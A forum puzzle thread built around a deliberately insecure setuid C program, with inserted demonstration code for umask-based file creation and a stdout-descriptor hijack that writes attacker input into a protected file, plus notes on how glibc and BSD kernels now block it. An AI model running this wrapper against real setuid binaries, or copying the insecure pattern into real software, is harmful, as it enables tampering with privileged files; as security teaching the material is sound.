Topic: Hack this professors code...
Aryabhatta
Hack this professors code...
« on: Oct 24th, 2007, 10:54pm »
All the security related threads reminded me of the good old days... Here is a hacking puzzle:

Your ~~Linux~~ SunOS professor (login name prof) as an assignment has set up a hacking puzzle for your class. With the C source code below, he has created a setuid executable (setuid to his login) which can be used to update the comments.txt file, which is writable only by him. The allowed.txt file is readable only by him and he has put some usernames and (corresponding) passwords in it. He challenges you to use the setuid executable to add a comment (of your choice) to the comments.txt file. Can it be done?

Here is the code:

    #include <stdio.h>
    #include <stdlib.h>

    int checkalloweduser(FILE *fp, char *name, char *pass)
    {
        /* Assume secure code (I was too lazy to write this) */
        /* returns 1 if username,password in file, else 0 */
        return 0;
    }

    /* Reads at most size-1 characters into buf; returns 1 if the line ended
       (newline or EOF) within the limit, 0 if the input was longer than that */
    int safe_gets(char *buf, int size)
    {
        int i = 0;
        int c;
        int flag = 0;
        while (i < size-1) {
            c = getchar();
            if (c == EOF || c == '\n') {
                flag = 1;
                break;
            }
            buf[i] = c;
            i++;
        }
        buf[i] = 0;
        return flag;
    }

    int main(int argc, char **argv)
    {
        char name[16];
        char pass[16];
        char comment[64];
        char allowed[] = "/users/prof/allowedlist.txt"; /* File containing list of people allowed to comment */
        char comments[] = "/users/prof/comments.txt";   /* Privileged comments file */
        FILE *fp_allowed = NULL;
        FILE *fp_comments = NULL;

        printf("Enter Username: ");
        if (!safe_gets(name, 16)) {
            exit(1);
        }
        if (!safe_gets(pass, 16)) {
            exit(1);
        }
        fp_comments = fopen(comments, "a+");
        fp_allowed = fopen(allowed, "r");
        if (!fp_comments || !fp_allowed) {
            exit(1);
        }
        if (checkalloweduser(fp_allowed, name, pass)) {
            printf("Enter comment: ");
            if (!safe_gets(comment, 64)) {
                exit(1);
            }
            fprintf(fp_comments, "%s\n", comment);
            exit(1);
        } else {
            printf("%s %s\n", name, pass);
            printf("Not valid. Ha!\n");
            printf("Bye\n");
            exit(2);
        }
        return 0;
    }
« Last Edit: Oct 26th, 2007, 12:04pm by Aryabhatta »
SMQ
Re: Hack this professors code...
« Reply #1 on: Oct 25th, 2007, 9:50am »
Two possibilities, both relying on situations not explicitly given in the problem statement:

1) If he has compiled the program with dynamic linking, depending on the recentness of the host OS, there may be ways of subverting the dynamic linker (by changing LD_LIBRARY_PATH to point to a hacked libc.so, or creating a substitute ld executable earlier in the path, for instance) to obtain a command shell with his privileges.

2) If he has neglected to create the comments.txt file, the fopen(comments, "a+") command will create it. By modifying the default umask an attacker could arrange to have it created world-writable.

Other than that -- although the safe_gets function is suspect just on general principle -- I don't see any exploitable conditions. The only other oddity I see is that comments is opened "a+" (read/write) rather than just "a" (write-only), but I don't see any way to turn that to an advantage.

--SMQ
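An added illustration of SMQ's second point, written for this page and not code from the thread: fopen() in "a+" mode creates a missing file with O_CREAT and mode 0666, and the kernel masks that with the process umask, which a setuid child simply inherits from whoever exec()ed it. The function below simulates the professor's program creating the comments file under an attacker-chosen umask and reports the resulting permission bits. The scratch path under /tmp and the helper names are assumptions for the demo; the umask is restored so the caller is unaffected.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Create `path` exactly the way the professor's program would if the
 * comments file did not exist yet (fopen() with "a+", i.e. O_CREAT with
 * mode 0666) while `child_umask` is in force, and return the permission
 * bits the new file ended up with, or -1 on error.  The umask survives
 * fork() and exec(), so whatever the attacker sets before launching the
 * setuid binary is what this call simulates.  (Hypothetical helper.) */
int mode_after_create(const char *path, mode_t child_umask)
{
    struct stat st;
    mode_t saved = umask(child_umask);
    FILE *fp = fopen(path, "a+");     /* new file gets 0666 & ~umask */
    umask(saved);                     /* put our own umask back */
    if (!fp) return -1;
    fclose(fp);
    if (stat(path, &st) < 0) return -1;
    return (int)(st.st_mode & 0777);
}

/* 1 if the mode bits allow "other" users to write, else 0. */
int world_writable(int mode)
{
    return (mode & S_IWOTH) != 0;
}

int main(void)
{
    char path[] = "/tmp/comments_umaskXXXXXX";   /* constructed scratch path */
    int fd = mkstemp(path);
    if (fd < 0) return 1;
    close(fd);
    unlink(path);                   /* the file must not exist for fopen() to create it */
    int m = mode_after_create(path, 0);
    printf("umask 000 -> %04o, world writable: %d\n", m, world_writable(m));
    unlink(path);
    m = mode_after_create(path, 022);
    printf("umask 022 -> %04o, world writable: %d\n", m, world_writable(m));
    unlink(path);
    return 0;
}
```

With umask 000 the file comes out 0666, so anyone can then append to it directly without going through the setuid program at all; with the usual 022 it is 0644. A setuid program that creates privileged files should therefore either set its own umask first or use open(2) with an explicit mode and fchmod(2), rather than trusting whatever umask the caller passed in.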
Aryabhatta
Re: Hack this professors code...
« Reply #2 on: Oct 25th, 2007, 9:57am »
on Oct 25th, 2007, 9:50am, SMQ wrote:
    Two possibilities, both relying on situations not explicitly given in the problem statement: 1) If he has compiled the program with dynamic linking, depending on the recentness of the host OS, there may be ways of subverting the dynamic linker (by changing LD_LIBRARY_PATH to point to a hacked libc.so, or creating a substitute ld executable earlier in the path, for instance) to obtain a command shell with his privileges. 2) If he has neglected to create the comments.txt file, the fopen(comments, "a+") command will create it. By modifying the default umask an attacker could arrange to have it created world-writable. Other than that -- although the safe_gets function is suspect just on general principle -- I don't see any exploitable conditions. The only other oddity I see is that comments is opened "a+" (read/write) rather than just "a" (write-only), but I don't see any way to turn that to an advantage. --SMQ

For setuid executables, I believe LD_LIBRARY_PATH is ignored (except on very old systems). I am not sure though, it has been a long time. Anyway, assume static linkage if you will. The umask idea is good (partial credit), but the file has already been created.
« Last Edit: Oct 25th, 2007, 10:17am by Aryabhatta »
towr
Re: Hack this professors code...
« Reply #3 on: Oct 25th, 2007, 10:10am »
The name and password strings don't seem to be protected against entering something like "%s%s%s%s%s", which could make printf misbehave. I don't see how to get anything useful out of it, though.
Aryabhatta
Re: Hack this professors code...
« Reply #4 on: Oct 25th, 2007, 10:19am »
on Oct 25th, 2007, 10:10am, towr wrote:
    The name and password strings don't seem to be protected against entering something like "%s%s%s%s%s", which could make printf misbehave. I don't see how to get anything useful out of it, though.

I think all cases of printf use their own format string, so even if we give %s as name etc., it will still behave, I think, but anything is possible. This puzzle could have multiple solutions...
Aryabhatta
Re: Hack this professors code...
« Reply #5 on: Oct 26th, 2007, 12:04pm »
It seems like the exploit I was thinking about does not work in most OSes these days (but it was prevalent a few years back, sorry, it's been a long time). I have changed the OS in the original post. Since I screwed up, a hint is in order: 0,1,2
« Last Edit: Oct 26th, 2007, 12:06pm by Aryabhatta »
Grimbal
Re: Hack this professors code...
« Reply #6 on: Oct 27th, 2007, 10:24am »
It is a bit suspicious that the comments file is opened before the user and password validation and is never closed.

On UNIX it is possible to fork a new process that shares the file table, in a way that one process can open a file for another process. So the idea was to create two processes sharing a file table, execute the 'prof' program in one process and use the open file in the other process.

I managed to create the 2 processes with clone(), but I couldn't execute the prof program using execl() and keep the same file table. I don't see the 2 files from the prof program open in the first process. But I tried that in Linux and I see now that Linux has been excluded.
« Last Edit: Oct 27th, 2007, 10:34am by Grimbal »
Aryabhatta
Re: Hack this professors code...
« Reply #7 on: Oct 27th, 2007, 12:26pm »
Good try Grimbal, but I am not sure if your approach works on SunOS also. Let me try a Linux version of the exploit I was thinking of. If it works I will let you guys know.

[edit] It does not work on Linux, and the one I have is at least 3-4 years old.

Ok. Here is the exploit which I had in mind, sorry that it has become outdated now. Sorry for the bad question.

Before execing the setuid process, close stdout and stderr. When the professor's program opens the comments file, it gets the file descriptor 1 (corresponding to stdout) and any printf will now go to that file, as printf writes to file descriptor 1.

It is strange that SunOS (supposedly) still has that bug, in 2007. [/edit]
« Last Edit: Oct 27th, 2007, 12:58pm by Aryabhatta »
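The descriptor-reuse trick Aryabhatta describes, as an added worked example written for this page (not code from the thread). Two pieces: demo_fd_hijack() reproduces in-process only the lines of the professor's program that matter (fopen() of the comments file followed by the printf() of the rejected credentials) after fd 1 has been closed, and checks that the "name pass" line really ended up inside the file; run_with_stdio_closed() is the attacker's wrapper, which feeds the credentials on fd 0, closes fds 1 and 2 and exec()s the target. The scratch file under /tmp, the use of /bin/sh as a stand-in target, and the helper names are all assumptions for the demo; the real stdout is saved with dup() and restored so the program can keep printing afterwards.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>

/* Victim side, reproduced in-process (hypothetical helper).  Returns 1 if
 * fopen() landed on descriptor 1 AND the "name pass" line is found in the
 * file afterwards, 0 if the trick did not work, -1 on a setup error. */
int demo_fd_hijack(const char *comments_path, const char *name, const char *pass)
{
    char expected[256], line[256];
    int found = 0;

    /* Keep fd 0 occupied, as in the real attack (the victim reads its input from it). */
    if (fcntl(STDIN_FILENO, F_GETFD) < 0 && open("/dev/null", O_RDONLY) != STDIN_FILENO)
        return -1;
    fflush(stdout);                           /* nothing of ours should leak into the file */
    int saved_stdout = dup(STDOUT_FILENO);    /* keep a copy so we can undo the close */
    if (saved_stdout < 0) return -1;
    close(STDOUT_FILENO);                     /* the attacker's step: exec with fd 1 closed */

    /* The victim's first open() now gets the lowest free descriptor: 1. */
    FILE *fp = fopen(comments_path, "a+");
    if (!fp) { dup2(saved_stdout, STDOUT_FILENO); close(saved_stdout); return -1; }
    int landed_on_stdout = (fileno(fp) == STDOUT_FILENO);

    /* printf() goes through stdio's stdout, which is bound to fd 1, i.e. to the
     * comments file opened in append mode.  Both strings are attacker input. */
    printf("%s %s\n", name, pass);
    printf("Not valid. Ha!\n");
    fflush(stdout);                           /* exit() performs this flush in the real program */
    fclose(fp);                               /* closes fd 1 again */

    dup2(saved_stdout, STDOUT_FILENO);        /* restore the demo's own stdout */
    close(saved_stdout);
    if (!landed_on_stdout) return 0;

    /* Read the file back and look for the attacker-controlled line. */
    snprintf(expected, sizeof expected, "%s %s\n", name, pass);
    FILE *rd = fopen(comments_path, "r");
    if (!rd) return -1;
    while (fgets(line, sizeof line, rd))
        if (strcmp(line, expected) == 0) found = 1;
    fclose(rd);
    return found;
}

/* Attacker side: run `prog` with `input` on a pipe on fd 0 and fds 1 and 2
 * closed, so the target's first two fopen() calls are handed descriptors 1
 * and 2.  Returns the child's exit status, or -1 on error. */
int run_with_stdio_closed(const char *prog, char *const argv[], const char *input)
{
    int pfd[2], status;
    if (pipe(pfd) < 0) return -1;
    fflush(stdout);                           /* don't duplicate buffered output in the child */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        dup2(pfd[0], STDIN_FILENO);
        close(pfd[0]);
        close(pfd[1]);
        close(STDOUT_FILENO);                 /* the comments file will land here ... */
        close(STDERR_FILENO);                 /* ... and the allowed-list file here */
        execv(prog, argv);
        _exit(127);
    }
    close(pfd[0]);
    void (*old_pipe)(int) = signal(SIGPIPE, SIG_IGN);   /* an early-exiting child must not kill us */
    size_t len = strlen(input);
    int wrote_all = write(pfd[1], input, len) == (ssize_t)len;
    close(pfd[1]);
    signal(SIGPIPE, old_pipe);
    if (waitpid(pid, &status, 0) < 0 || !wrote_all) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char path[] = "/tmp/comments_demoXXXXXX";   /* constructed scratch comments file */
    int fd = mkstemp(path);
    if (fd < 0) return 1;
    close(fd);
    int ok = demo_fd_hijack(path, "my comment here", "x");
    printf("fd-hijack demo: %s\n", ok == 1 ? "comment landed in the file" : "did not work");
    unlink(path);
    return ok == 1 ? 0 : 1;
}
```

Against the professor's program the wrapper would be run as run_with_stdio_closed("/path/to/setuid-binary", argv, "comment text\npw\n"): the name and password fields are the attacker's comment, and the rejection branch's printf("%s %s\n", name, pass) appends them to comments.txt (together with the "Not valid. Ha!" and "Bye" lines) when exit(2) flushes stdout. The reason it no longer works on Linux is glibc, not the kernel: when a set-user-ID program starts with AT_SECURE set, glibc's startup check (csu/check_fds.c) opens /dev/null on any of descriptors 0, 1 and 2 that are closed, so the victim's fopen() gets 3 as usual; the BSD kernels do the equivalent at exec time. A setuid program that cannot rely on that should do the same check itself at startup, before opening anything privileged.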